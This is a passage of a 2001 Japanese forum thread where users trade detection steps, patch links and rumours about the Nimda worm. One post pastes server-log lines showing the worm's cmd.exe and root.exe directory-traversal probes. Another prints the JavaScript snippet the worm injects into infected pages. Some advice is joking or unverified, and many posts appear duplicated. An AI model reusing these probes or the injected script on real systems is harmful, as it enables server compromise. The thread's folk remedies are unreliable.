日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MSN http://help.msn.co.jp/notice.htm
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
■ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MSN http://help.msn.co.jp/notice.htm
783 : :01/09/19 14:50 ID:FybIJFzw
ソースをみるアドレスってなんだったっけ?
○○○:http://www.honyarara.com/ってな具合の奴。
○○○:http://www.honyarara.com/ってな具合の奴。
785 :名無し:01/09/19 14:50 ID:9jLRYBy.
UNIXサーバにも感染したという未確認情報。
787 : :01/09/19 14:52 ID:/7WKjljc
789 : :01/09/19 14:51 ID:l3Az/LM.
791 : :01/09/19 14:53 ID:dvZoh28Q
未確認情報ってのはなんとなくそうおもったってこと?
793 : :01/09/19 14:53 ID:/LsUGfPI
794 : :01/09/19 14:55 ID:dUAYMCrs
>>785はネタなんだからうだうだ言うな。。
795 :前スレの494 :01/09/19 14:55 ID:m9yCiymc
サーバーが感染したときの現象を実体験からちょっと・・・
exchsrvr以下の「〜.exe」や「〜.dll」ファイルが、
ことごとく79225bytesの「〜.eml」に改ざんされていた。
感染したら、ほとんど再インストしか方法がないね、おそらく。
exchsrvr以下の「〜.exe」や「〜.dll」ファイルが、
ことごとく79225bytesの「〜.eml」に改ざんされていた。
感染したら、ほとんど再インストしか方法がないね、おそらく。
796 :ななしさん:01/09/19 14:56 ID:1wQ9QV6U
>1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
やっぱ「名前で検索」より「含まれる文字列」で検索でしょうか?
『*.eml』を含まれる文字列で検索したところ、3つのファイルがヒット。
いずれも『*.eml』の文字列が無い、一見普通のファイルなんですが・・・。
やっぱ「名前で検索」より「含まれる文字列」で検索でしょうか?
『*.eml』を含まれる文字列で検索したところ、3つのファイルがヒット。
いずれも『*.eml』の文字列が無い、一見普通のファイルなんですが・・・。
797 : :01/09/19 14:57 ID:jhDeJex2
798 : :01/09/19 14:57 ID:tFyg/UXY
感染してるかどうかってどうやつて調べるの?
799 : :01/09/19 14:57 ID:eTf3hr.k
win95てsp2対応してないのかな?
http://windowsupdate.microsoft.com/?IEで更新できない
http://windowsupdate.microsoft.com/?IEで更新できない
801 :名無しさん:01/09/19 14:59 ID:K0x/0bfc
感染したクライアントから感染してないIISにアクセスするとIISは感染するの?
802 :ななしさん:01/09/19 15:01 ID:1wQ9QV6U
803 : :01/09/19 15:02 ID:dUAYMCrs
805 :名無しさん:01/09/19 15:04 ID:K0x/0bfc
806 :名無しさん:01/09/19 15:05 ID:pxo5up2Q
VB2001使ってるんだけど、「パターン番号941から対応」、とトレンドマイクロのページに
書いてるのだけど、アップデートしようとしても更新されないのはなぜでしょうか...。
書いてるのだけど、アップデートしようとしても更新されないのはなぜでしょうか...。
807 :803:01/09/19 15:06 ID:dUAYMCrs
809 : :01/09/19 15:08 ID:e04NWwrc
810 :ナナシサソ:01/09/19 15:08 ID:uy8Pfu/w
なんとなくhttpd起動してみた。
オプション プロクシ/キャッシュのアクセス制御タブを、
アクセス許可=127.0.0.1
アクセス拒否=*.*.*.*
にしたが、これで簡易ファイアウォールになったのかな?
オプション プロクシ/キャッシュのアクセス制御タブを、
アクセス許可=127.0.0.1
アクセス拒否=*.*.*.*
にしたが、これで簡易ファイアウォールになったのかな?
812 : :01/09/19 15:09 ID:dhdAcbVI
ブラウザはfubでオミトロン使用。
オミトロンを落としてブラウザの設定もproxy切ってやってみたけどダメ。
ちゃんとキャッシュされないっぽい…。
オミトロンを落としてブラウザの設定もproxy切ってやってみたけどダメ。
ちゃんとキャッシュされないっぽい…。
814 : :01/09/19 15:10 ID:/LsUGfPI
ひょっとして漏れは間違ったことをしているのだろうか…
いや、きっとそうだろうな(w
いや、きっとそうだろうな(w
816 : :01/09/19 15:13 ID:Y5AkCUiQ
>>814
シリアル番号確認サイトってのがある。ここでチェックすると良いのでは :-)
http://inet.trendmicro.co.jp/customer/serialform/index.asp
シリアル番号確認サイトってのがある。ここでチェックすると良いのでは :-)
http://inet.trendmicro.co.jp/customer/serialform/index.asp
818 : :01/09/19 15:13 ID:gTVqO6AI
819 :うー:01/09/19 15:14 ID:4qbxbrYc
オンラインスキャンでドライブ全体を検索したが
ウイルスの感染はしていない。(パターン941で)
さらに、ハードディスク内について以下条件でファイル検索したが
見つからない
*.eml
readme.exe
MEP51B3.TMP.EXE
でも、再起動するたびCドライブが無条件で共有になる・・
OSはWIN2Kで前から5.5のSP2です。
同じ症状方います?
ウイルスの感染はしていない。(パターン941で)
さらに、ハードディスク内について以下条件でファイル検索したが
見つからない
*.eml
readme.exe
MEP51B3.TMP.EXE
でも、再起動するたびCドライブが無条件で共有になる・・
OSはWIN2Kで前から5.5のSP2です。
同じ症状方います?
820 : :01/09/19 15:14 ID:dUAYMCrs
821 :806:01/09/19 15:14 ID:pxo5up2Q
822 :803:01/09/19 15:16 ID:dUAYMCrs
824 :818:01/09/19 15:17 ID:gTVqO6AI
825 :803:01/09/19 15:18 ID:dUAYMCrs
VB2001をさっき再いんすとろーるしたから
いつからアップデート失敗してるかはログが残ってないけど。
いつからアップデート失敗してるかはログが残ってないけど。
ログにこんなのが2件ほど。
------------------------------------------------------
64.107.156.243 - - [19/Sep/2001:15:03:03 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 240
64.107.156.243 - - [19/Sep/2001:15:03:04 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:05 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:06 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:07 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:08 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:11 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:13 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:14 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
------------------------------------------------------
64.107.156.243 - - [19/Sep/2001:15:03:03 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 240
64.107.156.243 - - [19/Sep/2001:15:03:04 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:05 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:06 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:07 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:08 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:11 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206
64.107.156.243 - - [19/Sep/2001:15:03:13 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:14 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
827 :819:01/09/19 15:20 ID:4qbxbrYc
828 :818:01/09/19 15:20 ID:gTVqO6AI
829 :名無し:01/09/19 15:20 ID:9jLRYBy.
トレンドマイクロに電話殺到。
830 : :01/09/19 15:20 ID:oaR/VUnY
>>819
同じ状態です。
でもそれって確かもともと、W2Kでadministratorまたはそれと同等の権限をもつ
ユーザでログオンするとそうなったんじゃなかったかな?
「マイネットワーク」で自分のPCみて、Cドライブが見えてなければ
大丈夫なはず。
同じ状態です。
でもそれって確かもともと、W2Kでadministratorまたはそれと同等の権限をもつ
ユーザでログオンするとそうなったんじゃなかったかな?
「マイネットワーク」で自分のPCみて、Cドライブが見えてなければ
大丈夫なはず。
831 :818:01/09/19 15:20 ID:gTVqO6AI
ちなみにうちはWin98だから↑のは関係ないよね?
833 :803:01/09/19 15:21 ID:dUAYMCrs
834 : :01/09/19 15:21 ID:JgAOGVbo
スレッド一覧クリックしたら、
文字化けしたぞ!!!!
おれだけか???
文字化けしたぞ!!!!
おれだけか???
835 : :01/09/19 15:22 ID:gqFNfIjY
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』がどれも出てこなくて、http://www.trendmicro.co.jp/hcall/scan.htmでも
見つからなかったけどとりあえず安心していいかな?
見つからなかったけどとりあえず安心していいかな?
836 :830:01/09/19 15:22 ID:oaR/VUnY
837 : :01/09/19 15:23 ID:m7DA.Smk
WINMXはだいじょうぶですか?
鯖が妙に重いんだが…
ウィルスのせい?
ウィルスのせい?
839 : :01/09/19 15:24 ID:YhkDggS.
840 : :01/09/19 15:24 ID:xbjhX50U
たのむ誰か、相撲取りがくみあってキスしてヘンな音楽流れてる
ブラクラたのむ!!
ブラクラたのむ!!
841 :803:01/09/19 15:24 ID:dUAYMCrs
現象を詳しく書くと、
タスクトレイにあるVB2001アイコンを右クリック-「メイン画面を起動」
「アップデート」でアップデートボタンをクリック。
するとカプセルがチラチラしだしてファイル検出を始める。
ダウンロードし始めるのかな?と思うとキャッシュを探し出してきて
ダウンロード終わっちゃう。インストールには進まない。
タスクトレイにあるVB2001アイコンを右クリック-「メイン画面を起動」
「アップデート」でアップデートボタンをクリック。
するとカプセルがチラチラしだしてファイル検出を始める。
ダウンロードし始めるのかな?と思うとキャッシュを探し出してきて
ダウンロード終わっちゃう。インストールには進まない。
843 :803:01/09/19 15:26 ID:dUAYMCrs
ネットワークのエラーとか、そういう類のアラートは出ない。
844 :ぺ ◆lPYiMAEY :01/09/19 15:27 ID:.iBHXJik
VB2001、漏れも9/14頃からアップデートできなかったけど、
昨日やってみたらどういうわけかできちゃった。
何でだろ?
しかもアップデートボタン押して5分くらいしてからダウソ
開始されて、さらに5分くらいかかってダウソ終了。
・プログラムバージョン 8.06 Build1167
・エンジンバージョン 5.46
・パターン番号 940
昨日やってみたらどういうわけかできちゃった。
何でだろ?
しかもアップデートボタン押して5分くらいしてからダウソ
開始されて、さらに5分くらいかかってダウソ終了。
・プログラムバージョン 8.06 Build1167
・エンジンバージョン 5.46
・パターン番号 940
845 :818:01/09/19 15:27 ID:gTVqO6AI
847 :818:01/09/19 15:29 ID:gTVqO6AI
848 : :01/09/19 15:31 ID:S4B3xEUY
ザ・ワイドでやるぞ!
849 : :01/09/19 15:31 ID:dYZL6rwo
ニッテレ見れ
850 : :01/09/19 15:31 ID:gsbkGkZw
わいどみろ!
851 :818:01/09/19 15:31 ID:gTVqO6AI
もう一度アップデート試したら、「プロクシ・・・」とか出た。エラーには
違いないが、前に進んだ気がする。書きこむため、クッキーONにしてるからか
な。
違いないが、前に進んだ気がする。書きこむため、クッキーONにしてるからか
な。
852 : :01/09/19 15:32 ID:gsbkGkZw
ウイルス草野!
853 :ぺ ◆lPYiMAEY :01/09/19 15:32 ID:.iBHXJik
THE WIDE見るべし。
MSのウィルスこれからやるよ。
>846
いや、ところが940から941にアップデートしてくれないんだわ(w
どうしたものか・・・
MSのウィルスこれからやるよ。
>846
いや、ところが940から941にアップデートしてくれないんだわ(w
どうしたものか・・・
854 : :01/09/19 15:32 ID:iaQQZmng
855 : :01/09/19 15:33 ID:Yqm8oZbI
2チャンでるか?
856 : :01/09/19 15:33 ID:zvPGo23.
THE WIDEはじまったね。
ニムダってハングル?
ニムダってハングル?
857 : :01/09/19 15:33 ID:/LsUGfPI
おーでたでた。
858 : :01/09/19 15:33 ID:5GM4XpGo
今、日テレでやってる!!
859 : :01/09/19 15:34 ID:uoDPka6U
ワクチン出たのか
860 : :01/09/19 15:34 ID:liuCqwA2
はやっ
861 : :01/09/19 15:34 ID:N4U8iOCw
ワクチンが出来てたのか
862 : :01/09/19 15:34 ID:zvPGo23.
863 : :01/09/19 15:34 ID:liuCqwA2
おわるのがね
864 : :01/09/19 15:34 ID:hQ058jOA
うちのIEは4なんだけど、どう?
865 : :01/09/19 15:34 ID:/LsUGfPI
おわった・・・速報だけだったな。
866 : :01/09/19 15:34 ID:dvZoh28Q
おかざきじさつか〜
868 : :01/09/19 15:35 ID:vPl1Iwow
ラディンの仕業か?ネットテロだな
869 : :01/09/19 15:35 ID:oaR/VUnY
870 : :01/09/19 15:35 ID:fAFEbzjQ
テロと関係あるのか
ワクチンどこに!?
872 : :01/09/19 15:36 ID:gsbkGkZw
草野の仕業だ
873 : :01/09/19 15:36 ID:lITloGcw
) /i ヽ:;:::‐‐,ヽ /
ヽ!:::::レ――、 ,‐''ニニニ''''> i::::::::r ! !'
L:::! ir_ロ_ラ;ヽiirイ iコ ≧: !::::::!j i
!:::! ヲ‐)| i| `二ニ |::::::ノ r!
!;;;iイ ノ ! γヽ_ .:;ii i i i. / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
; ハ ト,、_, r´‐、、 ;;i:::::::;;! | | |
`;;;ヽ (;;;;;;;;;_:_:;,,>jヽ;;;;;;;;;;;;;! i i < 濡れ衣ムカつく。
:>::;;;iiト;;;;,,,,,,,,,,;;;``;;ii;;;;;;;;:::::| .| |
_/, ;:::::ヽ;::::::';:.,;:::..::::::::::::::;;;::i ト―. \____________
ヽ!:::::レ――、 ,‐''ニニニ''''> i::::::::r ! !'
L:::! ir_ロ_ラ;ヽiirイ iコ ≧: !::::::!j i
!:::! ヲ‐)| i| `二ニ |::::::ノ r!
!;;;iイ ノ ! γヽ_ .:;ii i i i. / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
; ハ ト,、_, r´‐、、 ;;i:::::::;;! | | |
`;;;ヽ (;;;;;;;;;_:_:;,,>jヽ;;;;;;;;;;;;;! i i < 濡れ衣ムカつく。
:>::;;;iiト;;;;,,,,,,,,,,;;;``;;ii;;;;;;;;:::::| .| |
_/, ;:::::ヽ;::::::';:.,;:::..::::::::::::::;;;::i ト―. \____________
874 : :01/09/19 15:36 ID:0JDuiGy.
各ソフト用の定義ファイルは出てるけど、
駆除ツールはまだ出てないよな?
>駆除:
>Symantec Security Responseは、
>このワームの駆除に必要な手順を調査しています。
駆除ツールはまだ出てないよな?
>駆除:
>Symantec Security Responseは、
>このワームの駆除に必要な手順を調査しています。
875 : :01/09/19 15:36 ID:gsbkGkZw
1000
876 :856:01/09/19 15:36 ID:zvPGo23.
877 : :01/09/19 15:37 ID:y58DMlOA
ワクチンはどこにあるのかね?
878 : :01/09/19 15:37 ID:YBuh9v9U
ホットメールも危険なの、今?
879 : :01/09/19 15:37 ID:/LsUGfPI
880 :803:01/09/19 15:38 ID:dUAYMCrs
VB2001のアップデート関係はちょっと移動しよう。
こんなスレ見つけた。
トレンドマイクロのウィルスバスター2001
http://mentai.2ch.net/test/read.cgi?bbs=bsoft&key=977579515
こんなスレ見つけた。
トレンドマイクロのウィルスバスター2001
http://mentai.2ch.net/test/read.cgi?bbs=bsoft&key=977579515
881 : :01/09/19 15:38 ID:ecPQDk4k
IE3は?だいじょうぶ?
882 : :01/09/19 15:40 ID:/LsUGfPI
883 :ぺ ◆lPYiMAEY :01/09/19 15:40 ID:.iBHXJik
>867
さっきやったよ。
先月からIE5.5SP2使ってるし、今朝IE6にアップデートしたから
大丈夫だよ多分。JavaもJavaScriptもいつも切ってるし。
さっきやったよ。
先月からIE5.5SP2使ってるし、今朝IE6にアップデートしたから
大丈夫だよ多分。JavaもJavaScriptもいつも切ってるし。
884 : :01/09/19 15:40 ID:HMlseq/g
再起動する度にmepが作成される
885 : :01/09/19 15:41 ID:0JDuiGy.
886 :_:01/09/19 15:41 ID:jzKbqutU
近所に来てる移動アイスクリーム屋がうるさくてしょうがない。
メリーゴーランドみたいな音楽をガンガン鳴らしてる。
死んでくれ。
メリーゴーランドみたいな音楽をガンガン鳴らしてる。
死んでくれ。
887 : :01/09/19 15:41 ID:/LsUGfPI
882の追加。
感染サイト行ってもダウンロード拒否すれば大丈夫。
感染サイト行ってもダウンロード拒否すれば大丈夫。
888 : :01/09/19 15:42 ID:hQ058jOA
889 : :01/09/19 15:42 ID:gsbkGkZw
ニュースサイトが感染しているらしいが、
感染したリストない?
感染したリストない?
890 : :01/09/19 15:42 ID:OqBIM1So
>>834
>スレッド一覧クリックしたら、
>文字化けしたぞ!!!!
フレーム単独で開いている状態で、subback.htmの拡張子をhtmlに変えて
読み込みし直すとちゃんとしたのが見れるYO!
先日の2ちゃんのシステム改変時に、htm→圧縮ファイル、html→非圧縮
ファイルって事になったらしく、前者の場合は環境によっては文字化けする
みたいdeath。詳しいことは全然知らないけど。
>スレッド一覧クリックしたら、
>文字化けしたぞ!!!!
フレーム単独で開いている状態で、subback.htmの拡張子をhtmlに変えて
読み込みし直すとちゃんとしたのが見れるYO!
先日の2ちゃんのシステム改変時に、htm→圧縮ファイル、html→非圧縮
ファイルって事になったらしく、前者の場合は環境によっては文字化けする
みたいdeath。詳しいことは全然知らないけど。
891 :現場の名無しさん:01/09/19 15:43 ID:rMHoLCL6
IE6にしてたのにヤラレタ。
ウイルスバスターで一応の駆除はしたが…。
サイト周りはしてなかったのに。
メールでばら撒かれたのかな。
ウイルスバスターで一応の駆除はしたが…。
サイト周りはしてなかったのに。
メールでばら撒かれたのかな。
892 : :01/09/19 15:43 ID:zYHPZHs6
893 : :01/09/19 15:43 ID:gTVqO6AI
894 : :01/09/19 15:44 ID:/LsUGfPI
895 : :01/09/19 15:44 ID:SjYSBaeo
896 : :01/09/19 15:44 ID:Cxmi7gFk
win98は大丈夫なの?
897 :818:01/09/19 15:45 ID:gTVqO6AI
898 : :01/09/19 15:45 ID:uoDPka6U
899 : :01/09/19 15:45 ID:NcSzOudQ
農水省、中日新聞、山梨大学やばいそうですbyTBS
900 : :01/09/19 15:45 ID:zYHPZHs6
901 : :01/09/19 15:46 ID:ImDE9Pwc
これを機にMa.....
902 : :01/09/19 15:46 ID:/LsUGfPI
903 : :01/09/19 15:47 ID:YhkDggS.
とりあえずIE6入れてみた。
904 :_:01/09/19 15:47 ID:o12ilfao
http://www.msn.co.jp/home.htm
MSNあんだけウィルスばらまいといて、トップページしらーっとしてるね。
MSNあんだけウィルスばらまいといて、トップページしらーっとしてるね。
905 : :01/09/19 15:48 ID:SjYSBaeo
906 : :01/09/19 15:48 ID:JgAOGVbo
>904 まったくだよね。
907 :818=893:01/09/19 15:49 ID:gTVqO6AI
908 : :01/09/19 15:50 ID:zPCkt1Os
本当の前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
909 : :01/09/19 15:50 ID:zYHPZHs6
910 : :01/09/19 15:50 ID:QpsLGwxM
911 : :01/09/19 15:50 ID:yPiXQHbc
Javascriptを切るってどうすればいいの?
912 : :01/09/19 15:50 ID:7jAGOnQE
前スレ見ようと思ったらなんか違うぞ・・・
913 : :01/09/19 15:51 ID:dARd0D.c
MSN見ても、だいじょぶ?
>>895
バスターでチェックしたらリードミーの実行が出てきた。
メールから感染したと思われる。
C:\WINDOWS\Temporary Internet Files\Content.IE5\KYOUX70K\wtf[1].eml (readme.exe),
TROJ_BKDOOR.OG,
↑ログ。
バスターでチェックしたらリードミーの実行が出てきた。
メールから感染したと思われる。
C:\WINDOWS\Temporary Internet Files\Content.IE5\KYOUX70K\wtf[1].eml (readme.exe),
TROJ_BKDOOR.OG,
↑ログ。
915 : :01/09/19 15:51 ID:NcSzOudQ
>>907
ほんとだ、山梨学院だねごめん。まちがえちゃった
ほんとだ、山梨学院だねごめん。まちがえちゃった
916 : :01/09/19 15:52 ID:AoixoLv2
トレンドマイクロのオンラインウイルススキャン重し
917 : :01/09/19 15:52 ID:J75YRgkw
ie5.5とie6.0ってどっちが安定してるんだ?
918 :このスレラストのコレ:01/09/19 15:52 ID:AmEHqk4c
状況報告ver1.04(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
LANによる感染
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
LANの共有フォルダを使っても自己増殖する。
感染鯖
ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
LANによる感染
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
LANの共有フォルダを使っても自己増殖する。
感染鯖
ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
919 : :01/09/19 15:52 ID:FbLx1hvw
なんか昨日辺りHP開いたら変なファイルダウソしちゃったっぽい・・・・・。
やばいよね。IE5.0なんだけど。
どうしよう〜〜〜〜〜。なんか全てのファイルの拡張子がなくなってるんだけど
これってウイルスのせいですか?
やばいよね。IE5.0なんだけど。
どうしよう〜〜〜〜〜。なんか全てのファイルの拡張子がなくなってるんだけど
これってウイルスのせいですか?
920 : :01/09/19 15:53 ID:kduBvuoU
今来たんだけどまったく意味がわかりません!
何をどうすればどうなるんですか?
何をどうすればどうなるんですか?
921 : :01/09/19 15:53 ID:zYHPZHs6
923 : :01/09/19 15:53 ID:dARd0D.c
>java関連とダウンロードのファイルのダウンロードを不許可。
ここの具体的なやり方がわからないのですが。
ここの具体的なやり方がわからないのですが。
あわててIE5.5 SP2をウィンドウズアップデート行って入れたんだけど、
ひょっとしたら前から SP2 だったかも。
SP2 っていつ頃から出てるの?
アップデートは月1ぐらいでしてるんだけど・・・。
ひょっとしたら前から SP2 だったかも。
SP2 っていつ頃から出てるの?
アップデートは月1ぐらいでしてるんだけど・・・。
925 :続き:01/09/19 15:54 ID:AmEHqk4c
状況報告ver1.04(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
926 : :01/09/19 15:56 ID:3AnOZHiA
>904
でもどっかにお詫び見たいの出してなかった?
でもどっかにお詫び見たいの出してなかった?
927 : :01/09/19 15:56 ID:J75YRgkw
デコードってどうするの?
930 : :01/09/19 15:58 ID:AmEHqk4c
>>923
やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。
やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。
931 : :01/09/19 15:58 ID:J75YRgkw
readme.exeをデコードしてみたいのだが
どうすればよい?
どうすればよい?
932 :ieie:01/09/19 15:58 ID:kRb7kVxA
ie6ってどこにあるの?
933 : :01/09/19 15:58 ID:y58DMlOA
ワクチン出来たらしいからもうちょっと待ちましょう。
934 : :01/09/19 15:58 ID:ecPQDk4k
みんなIE3以下にアップデートしたほうがいいんじゃないか?
935 :初心者さん達へ『*.eml』について:01/09/19 15:58 ID:/pyIBbxs
